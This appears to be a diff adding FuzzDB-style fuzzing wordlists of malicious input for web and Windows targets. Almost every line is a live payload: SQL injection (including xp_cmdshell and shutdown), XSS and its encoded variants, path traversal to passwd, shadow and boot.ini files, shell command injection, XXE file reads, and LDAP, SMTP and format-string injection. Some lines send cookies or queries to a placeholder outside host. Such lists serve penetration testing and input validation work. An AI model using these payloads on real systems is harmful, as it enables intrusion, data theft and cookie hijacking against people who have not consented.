+' or a=a--
+' or uid like '%
+' or uname like '%
+' or user like '%
+' or userid like '%
+' or username like '%
+'%20or%201=1
+'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
+'';!--"<XSS>=&{()}
+') or ('a'='a
+'--
+'; exec master..xp_cmdshell
+'; exec xp_regread
+'; waitfor delay '0:30:0'--
+';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
+';shutdown--
+'><script>alert(document.cookie);</script>
+'><script>alert(document.cookie)</script>
+'hi' or 'x'='x';
+'or select *
+'sqlattempt1
+'||UTL_HTTP.REQUEST
+'||Utl_Http.request('http://<yourservername>') from dual--
+(
+(')
+(sqlattempt2)
+)
+))))))))))
+*
+*&apos;
+*'
+*(|(mail=*))
+*(|(objectclass=*))
+*/*
+*|
++
++%00
+,@variable
+-
+--
+--';
+--sp_password
+-1
+-1.0
+-2
+-20
+-268435455
+..%%35%63
+..%%35c
+..%25%35%63
+..%255c
+..%5c
+..%bg%qf
+..%c0%af
+..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
+..%u2215
+..%u2216
+../
+../../../../../../../../../../../../etc/hosts
+../../../../../../../../../../../../etc/hosts%00
+../../../../../../../../../../../../etc/passwd
+../../../../../../../../../../../../etc/passwd%00
+../../../../../../../../../../../../etc/shadow
+../../../../../../../../../../../../etc/shadow%00
+..\
+..\..\..\..\..\..\..\..\..\..\etc\passwd
+..\..\..\..\..\..\..\..\..\..\etc\passwd%00
+..\..\..\..\..\..\..\..\..\..\etc\shadow
+..\..\..\..\..\..\..\..\..\..\etc\shadow%00
+.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
+.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
+/
+/%00/
+/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
+/%2A
+/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
+/&apos;
+/'
+/,%ENV,/
+/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
+/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
+/.../.../.../.../.../
+/../../../../../../../../%2A
+/../../../../../../../../../../../etc/passwd%00.html
+/../../../../../../../../../../../etc/passwd%00.jpg
+/../../../../../../../../../../etc/passwd
+/../../../../../../../../../../etc/passwd^^
+/../../../../../../../../../../etc/shadow
+/../../../../../../../../../../etc/shadow^^
+/../../../../../../../../bin/id|
+/..\../..\../..\../..\../..\../..\../boot.ini
+/..\../..\../..\../..\../..\../..\../etc/passwd
+/..\../..\../..\../..\../..\../..\../etc/shadow
+/./././././././././././etc/passwd
+/./././././././././././etc/shadow
+//
+//*
+/etc/passwd
+/etc/shadow
+/index.html|id|
+0
+0 or 1=1
+00
+0xfffffff
+1
+1 or 1 in (@@version)--
+1 or 1=1--
+1.0
+1; waitfor delay '0:30:0'--
+1;SELECT%20*
+1||Utl_Http.request('http://<yourservername>') from dual--
+2
+2147483647
+268435455
+65536
+:response.write 111111
+;
+; ping 127.0.0.1 ;
+;/usr/bin/id\n
+;echo 111111
+;id
+;id;
+;id\n
+;id|
+;ls -la
+;system('/usr/bin/id')
+;system('cat%20/etc/passwd')
+;system('id')
+;|/usr/bin/id|
+<
+<  script > < / script>
+<!
+<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
+<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
+</foo>
+<<
+<<<
+<<script>alert("XSS");//<</script>
+<>"'%;)(&+
+<?
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
+<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
+<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
+<IMG DYNSRC="javascript:alert('XSS')">
+<IMG LOWSRC="javascript:alert('XSS')">
+<IMG SRC=" &#14;  javascript:alert('XSS');">
+<IMG SRC="jav	ascript:alert('XSS');">
+<IMG SRC="jav&#x09;ascript:alert('XSS');">
+<IMG SRC="jav&#x0A;ascript:alert('XSS');">
+<IMG SRC="jav&#x0D;ascript:alert('XSS');">
+<IMG SRC="javascript:alert('XSS')"
+<IMG SRC="javascript:alert('XSS');">
+<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
+<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
+<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+<IMG SRC=JaVaScRiPt:alert('XSS')>
+<IMG SRC=`javascript:alert("'XSS'")`>
+<IMG SRC=javascript:alert(&quot;XSS&quot;)>
+<IMG SRC=javascript:alert('XSS')>
+<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
+<IMG%20SRC='javasc	ript:alert(document.cookie)'>
+<IMG%20SRC='javascript:alert(document.cookie)'>
+<foo></foo>
+<name>','')); phpinfo(); exit;/*</name>
+<script>alert("XSS")</script>
+<script>alert(document.cookie)</script>
+<xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
+<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
+<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
+<xss><script>alert('XSS')</script></vulnerable>
+<youremail>%0aBcc:<youremail>
+<youremail>%0aCc:<youremail>
+<youremail>%0d%0aBcc:<youremail>
+<youremail>%0d%0aCc:<youremail>
+=
+='
+=--
+=;
+>
+?x=
+?x="
+?x=>
+?x=|
+@&apos;
+@'
+@*
+@variable
+A
+ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
+FALSE
+NULL
+PRINT
+PRINT @@variable
+TRUE
+XXXXX.%p
+XXXXX`perl -e 'print ".%p" x 80'`
+[&apos;]
+[']
+\
+\";alert('XSS');//
+\"blah
+\&apos;
+\'
+\..\..\..\..\..\..\..\..\..\..\etc\passwd
+\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
+\..\..\..\..\..\..\..\..\..\..\etc\shadow
+\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
+\0
+\00
+\00\00
+\00\00\00
+\0\0
+\0\0\0
+\\
+\\&apos;/bin/cat%20/etc/passwd\\&apos;
+\\&apos;/bin/cat%20/etc/shadow\\&apos;
+\\/
+\\\\*
+\\\\?\\
+\n/bin/ls -al\n
+\n/usr/bin/id;
+\n/usr/bin/id\n
+\n/usr/bin/id|
+\nid;
+\nid\n
+\nid|
+\nnetstat -a%\n
+\t
+\u003C
+\u003c
+\x23
+\x27
+\x27UNION SELECT
+\x27\x4F\x52 SELECT *
+\x27\x6F\x72 SELECT *
+\x3C
+\x3D \x27
+\x3D \x3B'
+\x3c
+^&apos;
+^'
+`
+`/usr/bin/id`
+`dir`
+`id`
+`perl -e 'print ".%p" x 80'`%n
+`ping 127.0.0.1`
+a);/usr/bin/id
+a);/usr/bin/id;
+a);/usr/bin/id|
+a);id
+a);id;
+a);id|
+a)|/usr/bin/id
+a)|/usr/bin/id;
+a)|id
+a)|id;
+a;/usr/bin/id
+a;/usr/bin/id;
+a;/usr/bin/id|
+a;id
+a;id;
+a;id|
+http://<yourservername>/
+id%00
+id%00|
+insert
+like
+limit
+null
+or
+or 0=0 #
+or 0=0 --
+or 1=1--
+or%201=1
+or%201=1 --
+response.write 111111
+something%00html
+update
+x' or 1=1 or 'x'='y
+x' or name()='username' or 'x'='y
+xsstest
+xsstest%00"<>'
+{&apos;}
+|/usr/bin/id
+|/usr/bin/id|
+|id
+|id;
+|id|
+|ls
+|ls -la
+|nid\n
+|usr/bin/id\n
+||
+|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
+||/usr/bin/id;
+||/usr/bin/id|
+}

Fuzzing/FUZZDB_WindowsAattacks.txt

@@ -0,0 +1,531 @@
+# a wide sample of malicious input for windows targets
+A
+TRUE
+FALSE
+0
+00
+1
+-1
+1.0
+-1.0
+2
+-2
+-20
+65536
+268435455
+-268435455
+2147483647
+0xfffffff
+NULL
+null
+\0
+\00
+<  script > < / script>
+%0a
+%00
++%00
+\0
+\0\0
+\0\0\0
+\00
+\00\00
+\00\00\00
+$null
+$NULL
+`dir`
+\nnetstat -a%\n
+\"blah
+|dir|
+&quot;;id&quot;
+dir%00
+dir%00|
+|dir
+|dir|
+|/bin/ls -al
+?x=
+?x="
+?x=|
+?x=>
+/boot.ini
+ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
+../../boot.ini
+/../../../../../../../../%2A
+%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%	25%5c..%25%5c..%00
+%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%		25%5c..%25%5c..%255cboot.ini
+/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
+../../../../../../../../conf/server.xml
+C:/inetpub/wwwroot/global.asa
+C:\inetpub\wwwroot\global.asa
+C:/boot.ini
+C:\boot.ini
+../../../../../../../../../../../../localstart.asp%00
+../../../../../../../../../../../../localstart.asp
+../../../../../../../../../../../../boot.ini%00
+../../../../../../../../../../../../boot.ini
+/./././././././././././boot.ini
+/../../../../../../../../../../../boot.ini%00
+/../../../../../../../../../../../boot.ini
+/..\../..\../..\../..\../..\../..\../boot.ini
+/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
+\..\..\..\..\..\..\..\..\..\..\boot.ini
+..\..\..\..\..\..\..\..\..\..\boot.ini%00
+..\..\..\..\..\..\..\..\..\..\boot.ini
+/../../../../../../../../../../../boot.ini%00.html
+/../../../../../../../../../../../boot.ini%00.jpg
+/.../.../.../.../.../
+..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
+/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
+%0d%0aX-Injection-Header:%20AttackValue
+!@#0%^#0##018387@#0^^**(()
+%01%02%03%04%0a%0d%0aADSF
+/,%ENV,/
+&lt;!--#exec%20cmd=&quot;dir&quot;--&gt;
+&lt;!--#exec%20cmd=&quot;dir&quot;--&gt;
+%
+#
+*
+}
+;
+/
+\
+\\
+\\/
+\\\\*
+\\\\?\\
+&lt
+&lt;
+&LT
+&LT;
+<
+<<
+<<<
+|
+||
+`
+-
+--
+*|
+^'
+\'
+/'
+@'
+(')
+{'}
+[']
+*'
+#'
+!'
+!@#$%%^#$%#$@#$%$$@#$%^^**(()
+%01%02%03%04%0a%0d%0aADSF
+\t
+"\t"
+&#10;
+&#13;
+&#10;&#13;
+&#13;&#10;
+#xD
+#xA
+#xD#xA
+#xA#xD
+/%00/
+%00/
+%00
+<?
+%3C
+%3C%3F
+%60
+%5C
+%5C/
+%7C
+%00
+/%2A
+%2A
+%2C
+%20
+%20|
+%250a
+%2500
+../
+%2e%2e%2f
+..%u2215
+..%c0%af
+..%bg%qf
+..\
+..%5c
+..%%35c
+..%255c
+..%%35%63
+..%25%35%63
+..%u2216
+&#60
+&#060
+&#0060
+&#00060
+&#000060
+&#0000060
+&#60;
+&#060;
+&#0060;
+&#00060;
+&#000060;
+&#0000060;
+&#x3c
+&#x03c
+&#x003c
+&#x0003c
+&#x00003c
+&#x000003c
+&#x3c;
+&#x03c;
+&#x003c;
+&#x0003c;
+&#x00003c;
+&#x000003c;
+&#X3c
+&#X03c
+&#X003c
+&#X0003c
+&#X00003c
+&#X000003c
+&#X3c;
+&#X03c;
+&#X003c;
+&#X0003c;
+&#X00003c;
+&#X000003c;
+&#x3C
+&#x03C
+&#x003C
+&#x0003C
+&#x00003C
+&#x000003C
+&#x3C;
+&#x03C;
+&#x003C;
+&#x0003C;
+&#x00003C;
+&#x000003C;
+&#X3C
+&#X03C
+&#X003C
+&#X0003C
+&#X00003C
+&#X000003C
+&#X3C;
+&#X03C;
+&#X003C;
+&#X0003C;
+&#X00003C;
+&#X000003C;
+\x3c
+\x3C
+\u003c
+\u003C
+something%00html
+&apos;
+/&apos;
+\&apos;
+^&apos;
+@&apos;
+{&apos;}
+[&apos;]
+*&apos;
+#&apos;
+">xxx<P>yyy
+"><script>"
+<script>alert("XSS")</script>
+<<script>alert("XSS");//<</script>
+<script>alert(document.cookie)</script>
+'><script>alert(document.cookie)</script>
+'><script>alert(document.cookie);</script>
+\";alert('XSS');//
+%3cscript%3ealert("XSS");%3c/script%3e
+%3cscript%3ealert(document.cookie);%3c%2fscript%3e
+%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
+&ltscript&gtalert(document.cookie);</script>
+&ltscript&gtalert(document.cookie);&ltscript&gtalert
+<xss><script>alert('XSS')</script></vulnerable>
+<IMG%20SRC='javascript:alert(document.cookie)'>
+<IMG SRC="javascript:alert('XSS');">
+<IMG SRC="javascript:alert('XSS')"
+<IMG SRC=javascript:alert('XSS')>
+<IMG SRC=JaVaScRiPt:alert('XSS')>
+<IMG SRC=javascript:alert(&quot;XSS&quot;)>
+<IMG SRC=`javascript:alert("'XSS'")`>
+<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
+<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+<IMG%20SRC='javasc	ript:alert(document.cookie)'>
+<IMG SRC="jav	ascript:alert('XSS');">
+<IMG SRC="jav&#x09;ascript:alert('XSS');">
+<IMG SRC="jav&#x0A;ascript:alert('XSS');">
+<IMG SRC="jav&#x0D;ascript:alert('XSS');">
+<IMG SRC=" &#14;  javascript:alert('XSS');">
+<IMG DYNSRC="javascript:alert('XSS')">
+<IMG LOWSRC="javascript:alert('XSS')">
+<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
+<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
+<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
+<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
+"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>
+%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
+';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
+'';!--"<XSS>=&{()}
+
+'
+"
+#
+-
+--
+' --
+--';
+' ;
+= '
+= ;
+= --
+\x23
+\x27
+\x3D \x3B'
+\x3D \x27
+\x27\x4F\x52 SELECT *
+\x27\x6F\x72 SELECT *
+'or select *
+admin'--
+';shutdown--
+<>"'%;)(&+
+' or ''='
+' or 'x'='x
+" or "x"="x
+') or ('x'='x
+0 or 1=1
+' or 0=0 --
+" or 0=0 --
+or 0=0 --
+' or 0=0 #
+" or 0=0 #
+or 0=0 #
+' or 1=1--
+" or 1=1--
+' or '1'='1'--
+"' or 1 --'"
+or 1=1--
+or%201=1
+or%201=1 --
+' or 1=1 or ''='
+" or 1=1 or ""="
+' or a=a--
+" or "a"="a
+') or ('a'='a
+") or ("a"="a
+hi" or "a"="a
+hi" or 1=1 --
+hi' or 1=1 --
+hi' or 'a'='a
+hi') or ('a'='a
+hi") or ("a"="a
+'hi' or 'x'='x';
+@variable
+,@variable
+PRINT
+PRINT @@variable
+select
+insert
+as
+or
+procedure
+limit
+order by
+asc
+desc
+delete
+update
+distinct
+having
+truncate
+replace
+like
+handler
+bfilename
+' or username like '%
+' or uname like '%
+' or userid like '%
+' or uid like '%
+' or user like '%
+exec xp
+exec sp
+'; exec master..xp_cmdshell
+'; exec xp_regread
+t'exec master..xp_cmdshell 'nslookup www.google.com'--
+--sp_password
+\x27UNION SELECT
+' UNION SELECT
+' UNION ALL SELECT
+' or (EXISTS)
+' (select top 1
+'||UTL_HTTP.REQUEST
+1;SELECT%20*
+to_timestamp_tz
+tz_offset
+&lt;&gt;&quot;'%;)(&amp;+
+'%20or%201=1
+%27%20or%201=1
+%20$(sleep%2050)
+%20'sleep%2050'
+char%4039%41%2b%40SELECT
+&apos;%20OR
+'sqlattempt1
+(sqlattempt2)
+|
+%7C
+*|
+%2A%7C
+*(|(mail=*))
+%2A%28%7C%28mail%3D%2A%29%29
+*(|(objectclass=*))
+%2A%28%7C%28objectclass%3D%2A%29%29
+(
+%28
+)
+%29
+&
+%26
+!
+%21
+' or 1=1 or ''='
+' or ''='
+x' or 1=1 or 'x'='y
+/
+//
+//*
+*/*
+@*
+count(/child::node())
+x' or name()='username' or 'x'='y
+<name>','')); phpinfo(); exit;/*</name>
+<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
+<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
+<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
+<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
+<xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
+<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
+<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
+
+'
+'--
+' or 1=1--
+1 or 1=1--
+' or 1 in (@@version)--
+1 or 1 in (@@version)--
+'; waitfor delay '0:30:0'--
+1; waitfor delay '0:30:0'--
+'||Utl_Http.request('http://<yourservername>') from dual--
+1||Utl_Http.request('http://<yourservername>') from dual--
+xsstest
+xsstest%00"<>'
+</foo>
+<foo></foo>
+))))))))))
+../../../../../../../../../../boot.ini
+..\..\..\..\..\..\..\..\..\..\boot.ini
+../../../../../../../../../../windows/win.ini
+..\..\..\..\..\..\..\..\..\..\windows\win.ini
+|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
+| ping -i 30 127.0.0.1 |
+| ping -n 30 127.0.0.1 |
+& ping -i 30 127.0.0.1 &
+& ping -n 30 127.0.0.1 &
+; ping 127.0.0.1 ;
+%0a ping -i 30 127.0.0.1 %0a
+`ping 127.0.0.1`
+;echo 111111
+echo 111111
+response.write 111111
+:response.write 111111
+http://<yourservername>/
+<youremail>%0aCc:<youremail>
+<youremail>%0d%0aCc:<youremail>
+<youremail>%0aBcc:<youremail>
+<youremail>%0d%0aBcc:<youremail>
+%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
+%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
+# known cross platform source Code, file disclosure attack patterns - append after file or dir path
+%70
+.%E2%73%70
+%2e0
+%2e
+.
+\
+?*
+%20
+%00
+%2f
+%5c
+count(/child::node())
+x' or name()='username' or 'x'='y
+<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
+<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
+"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
+"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
+%00
+NULL
+null
+'
+"
+;
+<!
+-
+=
++
+"
+&
+!
+|
+<
+>
+"><script>alert(1)</script>
+%0d
+%0a
+%7f
+%ff
+-1
+other
+%s%p%x%d
+%99999999999s
+%08x
+%20d
+%20n
+%20x
+%20s
+%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d 
+%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
+%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
+%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
+%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
+%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
+%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
+%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
+%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
+%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
+%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
+%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
+%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
+%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
+%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
+%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
+%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
+XXXXX.%p
